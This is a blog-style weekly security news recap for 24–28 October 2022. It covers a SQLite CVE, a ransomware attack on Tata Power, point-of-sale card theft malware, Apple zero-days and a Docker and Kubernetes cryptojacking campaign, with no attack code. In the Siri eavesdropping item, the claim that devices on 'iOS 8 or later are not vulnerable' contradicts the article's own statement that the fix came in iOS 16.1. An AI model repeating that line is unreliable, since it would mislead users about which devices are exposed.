Cyber Security Weekly Recap (24-28 Oct.)

Syber Security Weekly Recap 24 28 Oct 1024x666

A 22-year-old flaw in the popular SQLite database library has been reported.

The SQLite database library has a critical flaw that might be exploited by malicious actors to crash or take control of affected applications. The flaw was introduced as part of a code modification in October 2000.

This bug, identified as CVE-2022-35737 (CVSS score: 7.5), has been present in SQLite for 22 years, affecting versions 1.0.12 through 3.39.1, and was patched in version 3.39.2 on July 21, 2022.

Andreas Kellas of Trail of Bits wrote in a technical article that, depending on how the software is written, “CVE-2022-35737” could be used on 64-bit computers to launch DoS attacks and run arbitrary code.

Tata Power Energy Company was hit by Hive Ransomware hackers.

The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for the cyber attack on Tata Power that was reported by the company two weeks ago.

It is believed that the accident took place on October 3, 2022. The threat actor has been seen distributing information it obtained before encrypting the network as part of a double extortion attempt.

The affected data allegedly includes emails, addresses, phone numbers, passport numbers, taxpayer data, and contractual forms signed by clients.

Rakesh Krishnan, a security researcher, said that sensitive information like Aadhaar numbers, PANs, driver’s license information, pay data, and technical blueprints were part of the breach.

The Mumbai-based corporation is part of the Tata Group, and it operates as India’s biggest integrated power company.

More than 167,000 credit card numbers were stolen by hackers using two types of point-of-sale malware.

A threat actor has used two variants of point-of-sale (PoS) malware to collect data from over 167,000 credit cards.

Group-IB, a cybersecurity firm based in Singapore, estimates that the operators might make as much as $3.34 million by selling the stolen data dumps on underground forums.

PoS malware is a continuous danger, even though the vast majority of attacks aimed at capturing payment data depend on JavaScript sniffers (aka web skimmers) covertly put on e-commerce websites.

The Group-IB research team that discovered the C2 servers used by the two PoS viruses estimates that between February and September of 2022, a total of 77,428 and 90,024 separate payment data were stolen by the MajikPOS and Treasure Hunter malware, respectively.

Most of the compromised cards reportedly originated from financial institutions in the United States, Puerto Rico, Peru, Panama, the United Kingdom, Canada, France, Poland, Norway, and Costa Rica.

The criminals behind the operation have yet to be identified, and it is unclear whether or not the stolen information has been sold.

If issuing banks don’t implement sufficient protection, criminals may use cloned cards to conduct fraudulent purchases and cash withdrawals.

Apple Issues a Patch for a New Zero-Day Vulnerability in iOS and iPadOS

The tech giant released a fix for a zero-day weakness in iOS and iPadOS that it claims is being actively exploited in the wild.

This vulnerability, tracked as CVE-2022-42827, is an out-of-bounds write in the Kernel that might be exploited by a malicious program to run arbitrary code with root privileges.

When an application tries to write to a memory address outside its access permissions, data damage, program termination, or even the execution of malicious code might follow. This vulnerability is known as an out-of-bounds write.

The iPhone manufacturer claimed to have fixed the issue with enhanced bounds checking, and it gave credit for the discovery of the flaw to an unnamed researcher.

Apple iOS and macOS Flaws May Have Allowed Applications to Listen to Your Conversations with Siri

A now-fixed security flaw in Apple’s mobile operating systems could have allowed apps with Bluetooth access to eavesdrop on users’ conversations with Siri.

Apple has addressed the Core Bluetooth problem with enhanced entitlements in iOS 16.1.

Guilherme Rambo, an app developer, is credited with finding and disclosing the flaw in August of 2022. The SiriSpy vulnerability has been tracked as CVE-2022-32946.

Rambo said that any app with Bluetooth access might record users’ conversations with Siri and audio from the iOS keyboard dictation feature when they use headphones like AirPods or Beats.

The software wouldn’t even leave a record that it was listening to the mic or ask for permission to do so.

Devices running iOS 8 or later are not vulnerable; a software update is available for iPad Pro (all models), iPad Air (3rd generation and later), iPad (all generations and later), and iPad mini (5th generation and later) to fix this issue. The issue has also been fixed in all currently supported versions of macOS.

An All-New Cryptojacking Attack on Docker and Kubernetes Hosts

A new cryptojacking effort was identified with the goal of illegally mining bitcoin through the exploitation of security holes in Docker and Kubernetes.

CrowdStrike, a cybersecurity firm, called this operation “Kiss-a-dog” because of its shared command-and-control infrastructure with other organizations like TeamTNT, which are notorious for attacking poorly configured Docker and Kubernetes systems.

According to CrowdStrike researcher Manoj Ahuje’s technical study, the URL used in the payload is hidden with backslashes to evade automated decoding and regex matching to extract the malicious site.

The next phase in the attack chain is to try to break out of the container and spread throughout the compromised network, while also disabling the cloud service that is monitoring the intrusion.

About the author

Lidia Howler

Lidia is a web content creator with years of experience in the cyber-security sector. She helps readers with articles on malware removal and online security. Her strive for simplicity and well-researched information provides users with easy-to-follow It-related tips and step-by-step tutorials.

Leave a Comment